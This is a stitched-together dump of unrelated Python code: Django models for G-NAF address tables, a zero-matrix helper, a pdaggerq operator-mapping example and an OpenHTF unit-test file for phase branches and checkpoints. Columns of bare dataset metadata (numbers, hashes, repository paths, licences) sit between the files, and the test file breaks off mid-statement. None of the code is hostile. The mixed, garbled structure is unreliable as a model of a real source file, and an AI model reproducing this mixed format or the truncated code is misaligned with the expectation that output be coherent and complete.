class StreetLocalityPoint(models.Model):
street_locality_point_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_locality_pid = models.ForeignKey(StreetLocality, models.DO_NOTHING, db_column='street_locality_pid', null=True)
boundary_extent = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_locality_point'
class StreetSuffixAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_suffix_aut'
class StreetTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=50)
description = models.CharField(max_length=15, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_type_aut'
class Address(models.Model):
address_detail_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField(blank=True, null=True)
date_last_modified = models.DateField(blank=True, null=True)
date_retired = models.DateField(blank=True, null=True)
building_name = models.CharField(max_length=200, blank=True, null=True)
lot_number_prefix = models.CharField(max_length=2, blank=True, null=True)
lot_number = models.CharField(max_length=5, blank=True, null=True)
lot_number_suffix = models.CharField(max_length=2, blank=True, null=True)
lot_number_combined = models.TextField(blank=True, null=True)
flat_type_code = models.CharField(max_length=7, blank=True, null=True)
flat_number_prefix = models.CharField(max_length=2, blank=True, null=True)
flat_number = models.DecimalField(max_digits=5, decimal_places=0, blank=True, null=True)
flat_number_suffix = models.CharField(max_length=2, blank=True, null=True)
flat_number_combined = models.TextField(blank=True, null=True)
level_type_code = models.CharField(max_length=4, blank=True, null=True)
level_number_prefix = models.CharField(max_length=2, blank=True, null=True)
level_number = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
level_number_suffix = models.CharField(max_length=2, blank=True, null=True)
level_number_combined = models.TextField(blank=True, null=True)
number_first_prefix = models.CharField(max_length=3, blank=True, null=True)
number_first = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_first_suffix = models.CharField(max_length=2, blank=True, null=True)
number_first_combined = models.TextField(blank=True, null=True)
number_last_prefix = models.CharField(max_length=3, blank=True, null=True)
number_last = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_last_suffix = models.CharField(max_length=2, blank=True, null=True)
number_last_combined = models.TextField(blank=True, null=True)
house_number = models.TextField(blank=True, null=True)
street_locality_pid = models.CharField(max_length=15, blank=True, null=True)
street_name = models.CharField(max_length=100, blank=True, null=True)
street_type = models.CharField(max_length=50, blank=True, null=True)
street_suffix_code = models.CharField(max_length=15, blank=True, null=True)
street_suffix_name = models.CharField(max_length=50, blank=True, null=True)
street = models.TextField(blank=True, null=True)
locality_pid = models.CharField(max_length=15, blank=True, null=True)
locality_name = models.CharField(max_length=100, blank=True, null=True)
state = models.CharField(max_length=3, blank=True, null=True)
alias_principal = models.CharField(max_length=1, blank=True, null=True)
postcode = models.CharField(max_length=4, blank=True, null=True)
confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
address_site_pid = models.CharField(max_length=15, blank=True, null=True)
address_type_name = models.CharField(max_length=50, blank=True, null=True)
address_site_name = models.CharField(max_length=200, blank=True, null=True)
level_geocoded_code = models.DecimalField(max_digits=2, decimal_places=0, blank=True, null=True)
primary_secondary = models.CharField(max_length=1, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address'
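The models above follow Django's inspectdb conventions for the G-NAF tables, with Address serving as a denormalized, query-friendly flattening of the detail tables. As a minimal usage sketch (assuming these models live in an app importable as `gnaf`, which is a hypothetical path, and that the tables are populated), a street-level lookup might look like:

# Minimal sketch, assuming the models above are importable from a `gnaf` app.
from gnaf.models import Address

def addresses_on_street(locality_name, street_name):
    # Case-insensitive match on the denormalized locality/street columns,
    # skipping rows that were never geocoded.
    return (Address.objects
            .filter(locality_name__iexact=locality_name,
                    street_name__iexact=street_name)
            .exclude(latitude__isnull=True)
            .order_by('number_first'))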
| 47.828974
| 180
| 0.752135
| 3,199
| 23,771
| 5.340731
| 0.047827
| 0.08007
| 0.105765
| 0.138308
| 0.876207
| 0.847878
| 0.813287
| 0.805853
| 0.789406
| 0.764472
| 0
| 0.019391
| 0.140886
| 23,771
| 496
| 181
| 47.925403
| 0.817207
| 0
| 0
| 0.575448
| 0
| 0
| 0.076732
| 0.022002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002558
| 0
| 0.820972
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1785f02aa39f5af36b083c02f332e467dcca005b
| 72
|
py
|
Python
|
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
def zero_matrix(n):
return [[0 for j in range(n)] for i in range(n)]
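A quick note on why the nested comprehension is the right construction: the tempting shortcut [[0] * n] * n builds one row object and repeats the reference n times, so mutating one cell changes every row. A short illustration of the difference:

# Illustration of the row-aliasing pitfall the comprehension above avoids.
aliased = [[0] * 3] * 3
aliased[0][0] = 1
print(aliased)      # [[1, 0, 0], [1, 0, 0], [1, 0, 0]] -- rows are shared

independent = zero_matrix(3)
independent[0][0] = 1
print(independent)  # [[1, 0, 0], [0, 0, 0], [0, 0, 0]]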
| 36
| 52
| 0.638889
| 16
| 72
| 2.8125
| 0.6875
| 0.311111
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0.208333
| 72
| 2
| 52
| 36
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
da414e248af43e6dbfc1395865436c8f352d6e71
| 1,057
|
py
|
Python
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 37
|
2020-09-17T19:29:18.000Z
|
2022-03-03T16:29:16.000Z
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 7
|
2021-02-28T19:22:12.000Z
|
2022-02-22T15:17:47.000Z
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 6
|
2021-02-16T22:34:29.000Z
|
2021-12-04T19:37:23.000Z
|
"""
Example for vacuum normal ordering the T2 operator for 2-RDM theory
"""
import pdaggerq
def main():
print("T2 mappings")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*','j*','k','n*','m', 'l'])
ahat.add_new_string()
ahat.set_string(['n*','m','l', 'i*','j*', 'k'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("T1 mappings")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*','j*','k*','n','m', 'l'])
ahat.add_new_string()
ahat.set_string(['n','m','l', 'i*','j*', 'k*'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("Q -> D")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i', 'j', 'k*', 'l*'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("G -> D")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*', 'j', 'k*', 'l'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
if __name__ == "__main__":
main()
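Every mapping in main() repeats the same call pattern: set one or more operator strings, simplify, print, clear. A small wrapper (hypothetical, not part of the pdaggerq API) would remove the duplication while keeping the same calls:

# Hypothetical convenience wrapper around the pattern used in main().
def print_mapping(label, *operator_strings):
    print(label)
    ahat = pdaggerq.pq_helper('true')  # 'true' vacuum, as in the examples
    for ops in operator_strings:
        ahat.set_string(ops)
        ahat.add_new_string()
    ahat.simplify()
    ahat.print()
    ahat.clear()

# e.g. the "Q -> D" mapping: print_mapping("Q -> D", ['i', 'j', 'k*', 'l*'])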
| 22.489362
| 67
| 0.555345
| 150
| 1,057
| 3.713333
| 0.26
| 0.075404
| 0.140036
| 0.172352
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0
| 0.004773
| 0.20719
| 1,057
| 47
| 68
| 22.489362
| 0.659905
| 0.063387
| 0
| 0.611111
| 0
| 0
| 0.107833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.027778
| 0
| 0.055556
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da461dce6cc6c1fcee95c0fda2ee2fe41613829a
| 28,928
|
py
|
Python
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 372
|
2015-09-02T00:08:40.000Z
|
2022-03-30T17:29:30.000Z
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 772
|
2015-09-01T22:00:20.000Z
|
2022-02-10T14:53:14.000Z
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 204
|
2015-09-01T20:48:21.000Z
|
2022-03-13T22:20:50.000Z
|
"""Tests for google3.third_party.py.openhtf.test.core.phase_branches."""
import unittest
import mock
import openhtf as htf
from openhtf.core import phase_branches
from openhtf.core import phase_executor
from openhtf.core import test_record
from openhtf.util import test as htf_test
class BranchDiagResult(htf.DiagResultEnum):
SET = 'set'
NOT_SET = 'not_set'
@htf.PhaseDiagnoser(BranchDiagResult)
def branch_diagnoser(phase_rec):
del phase_rec # Unused.
return htf.Diagnosis(BranchDiagResult.SET)
@htf.diagnose(branch_diagnoser)
def add_set_diag():
pass
@htf.PhaseOptions()
def run_phase():
pass
@htf.PhaseOptions()
def fail_phase():
return htf.PhaseResult.FAIL_AND_CONTINUE
@htf.PhaseOptions()
def error_phase():
raise Exception('broken')
def _rename(phase, new_name):
assert isinstance(new_name, str)
return htf.PhaseOptions(name=new_name)(phase)
def _fake_phases(*new_names):
return [_rename(run_phase, name) for name in new_names]
phase0, phase1, phase2, phase3 = _fake_phases('phase0', 'phase1', 'phase2',
'phase3')
skip0 = _rename(run_phase, 'skip0')
class BranchSequenceTest(unittest.TestCase):
def test_as_dict(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = {
'name': None,
'nodes': [run_phase._asdict()],
'diag_condition': {
'condition': phase_branches.ConditionOn.ALL,
'diagnosis_results': [BranchDiagResult.SET],
},
}
self.assertEqual(expected, branch._asdict())
def test_with_args(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,),
name='name_{arg}')
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.with_args(arg=1),),
name='name_1')
self.assertEqual(expected, branch.with_args(arg=1))
def test_with_plugs(self):
class MyPlug(htf.BasePlug):
pass
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,),
name='name_{my_plug.__name__}')
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.with_plugs(my_plug=MyPlug),),
name='name_MyPlug')
self.assertEqual(expected, branch.with_plugs(my_plug=MyPlug))
def test_load_code_info(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.load_code_info(),))
self.assertEqual(expected, branch.load_code_info())
def test_apply_to_all_phases(self):
def do_rename(phase):
return _rename(phase, 'blah_blah')
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(do_rename(run_phase),))
self.assertEqual(expected, branch.apply_to_all_phases(do_rename))
class BranchSequenceIntegrationTest(htf_test.TestCase):
def _assert_phase_names(self, expected_names, test_rec):
run_phase_names = [p.name for p in test_rec.phases[1:]]
self.assertEqual(expected_names, run_phase_names)
@htf_test.yields_phases
def test_branch_taken(self):
nodes = [
add_set_diag,
phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
run_phase),
]
test_rec = yield htf.Test(nodes)
self.assertTestPass(test_rec)
self._assert_phase_names(['add_set_diag', 'run_phase'], test_rec)
self.assertEqual([
test_record.BranchRecord(
name=None,
diag_condition=phase_branches.DiagnosisCondition(
condition=phase_branches.ConditionOn.ALL,
diagnosis_results=(BranchDiagResult.SET,)),
branch_taken=True,
evaluated_millis=mock.ANY)
], test_rec.branches)
@htf_test.yields_phases
def test_branch_not_taken(self):
nodes = [
phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.NOT_SET),
run_phase),
]
test_rec = yield htf.Test(nodes)
self.assertTestPass(test_rec)
self._assert_phase_names([], test_rec)
self.assertEqual([
test_record.BranchRecord(
name=None,
diag_condition=phase_branches.DiagnosisCondition(
condition=phase_branches.ConditionOn.ALL,
diagnosis_results=(BranchDiagResult.NOT_SET,)),
branch_taken=False,
evaluated_millis=mock.ANY)
], test_rec.branches)
class PhaseFailureCheckpointIntegrationTest(htf_test.TestCase):
def test_invalid_action(self):
with self.assertRaises(ValueError):
phase_branches.PhaseFailureCheckpoint.last(
'bad_action', action=htf.PhaseResult.CONTINUE)
def test_asdict(self):
checkpoint = phase_branches.PhaseFailureCheckpoint.last('checkpoint')
self.assertEqual(
{
'name': 'checkpoint',
'action': htf.PhaseResult.STOP,
'previous_phases_to_check': phase_branches.PreviousPhases.LAST,
}, checkpoint._asdict())
@htf_test.yields_phases
def test_last__no_previous_phases(self):
self.test_start_function = None
test_rec = yield htf.Test(
phase_branches.PhaseFailureCheckpoint.last('last_prev'))
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'NoPhasesFoundError')
self.assertEqual(0, len(test_rec.phases))
self.assertEqual([
test_record.CheckpointRecord(
name='last_prev',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(phase_branches.NoPhasesFoundError,
mock.ANY, mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__no_failures(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.last('last_pass'), phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure_too_early(self):
test_rec = yield htf.Test(
fail_phase, phase0,
phase_branches.PhaseFailureCheckpoint.last('last_early_fail'), phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_early_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure_too_late(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.last('last_late_fail'),
fail_phase, phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_late_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure(self):
test_rec = yield htf.Test(
phase0, fail_phase,
phase_branches.PhaseFailureCheckpoint.last('last_fail'), error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__not_in_subtest(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.last(
'last_subtest', action=htf.PhaseResult.FAIL_SUBTEST), error_phase)
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'InvalidPhaseResultError')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(
phase_executor.InvalidPhaseResultError, mock.ANY,
mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__pass_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_pass_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__early_fail_out_of_subtest(self):
test_rec = yield htf.Test(
fail_phase, phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_pass_early_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass_early_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__early_fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', fail_phase, phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1, fail_phase,
phase_branches.PhaseFailureCheckpoint.last(
'last_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__no_previous_phases(self):
self.test_start_function = None
test_rec = yield htf.Test(
phase_branches.PhaseFailureCheckpoint.all_previous('all_prev'))
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'NoPhasesFoundError')
self.assertEqual([
test_record.CheckpointRecord(
name='all_prev',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(phase_branches.NoPhasesFoundError,
mock.ANY, mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__pass(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.all_previous('all_pass'),
phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='all_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__fail(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.all_previous('all_fail'),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__earlier_fail(self):
test_rec = yield htf.Test(
fail_phase, phase0,
phase_branches.PhaseFailureCheckpoint.all_previous('all_earlier_fail'),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_earlier_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__not_in_subtest(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_subtest', action=htf.PhaseResult.FAIL_SUBTEST), error_phase)
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'InvalidPhaseResultError')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(
phase_executor.InvalidPhaseResultError, mock.ANY,
mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__pass_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_pass_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertEqual([
test_record.CheckpointRecord(
name='all_pass_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__early_fail_out_of_subtest(self):
test_rec = yield htf.Test(
fail_phase, phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_early_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_early_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__early_fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', fail_phase, phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1, fail_phase,
